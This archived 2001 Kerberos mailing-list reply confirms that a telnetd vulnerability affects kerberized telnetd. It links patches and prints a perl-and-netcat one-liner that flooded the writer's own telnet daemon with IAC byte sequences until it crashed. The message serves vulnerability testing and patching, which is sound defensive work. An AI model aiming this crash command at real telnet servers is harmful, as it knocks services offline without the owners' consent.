[14725] in Kerberos
Re: Kerberos telnet and today's telnet vulnerability announcement
daemon@ATHENA.MIT.EDU (Voradesh Yenbut)
Tue Jul 24 18:44:23 2001
Message-Id: <200107242225.f6OMPHgs014525@vetch.cs.washington.edu>
To: John Rudd <jrudd@cats.ucsc.edu>
cc: kerberos@mit.edu
In-Reply-To: Message from John Rudd <jrudd@cats.ucsc.edu>
of "Tue, 24 Jul 2001 14:24:44 PDT." <3B5DE79C.F5E14EDC@cats.ucsc.edu>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Tue, 24 Jul 2001 15:25:17 -0700
From: Voradesh Yenbut <yenbut@cs.washington.edu>
Yes, it does.
I tested as suggested on FreeBSD security list with the following command
to our kerberized telnetd, and it dumped core.
perl -e '$c=sprintf("%c%c", 255, 246); sleep 10; print $c x1000 . "\r\n"' \
| nc localhost 23
(The nc command is netcat-1.10 from ftp://avian.org/src/hacks/.)
The following patches by kerberos versions were applied to our kerberized
telnetd to temporarily plug the hole:
ftp://ftp.cs.washington.edu/cse/patches/krb5-1.1.1.patch
ftp://ftp.cs.washington.edu/cse/patches/krb5-1.2.2.patch
The patches were derived from an earlier version of FreeBSD patches
before the FreeBSD Security Advisory FreeBSD-SA-01:49.telnetd
(http://docs.freebsd.org/mail/current/freebsd-announce.html) was
issued, so the patches may not be up to date.
---
Voradesh Yenbut Software Engineer, CSE
1 206 685-0912 BOX 352350, U of Washington
yenbut@cs.washington.edu Seattle, WA 98195
> So, most of my machines don't use the standard vendor telnet, but
> instead use one form or another of a kerberized telnet. Does anyone
> know if today's announcement applies to kerberized telnetd's?
>
> http://www.securityfocus.com/bid/3064
>
> --
> John "kzin" Rudd http://people.ucsc.edu/~jrudd
> Truth decays into beauty, while beauty soon becomes merely charm. Charm
> ends up as strangeness, and even that doesn't last. (Physics of Quarks)
> -----===== Kein Mitleid Fu:r MicroSoft (www.kmfms.com) ======-----
>
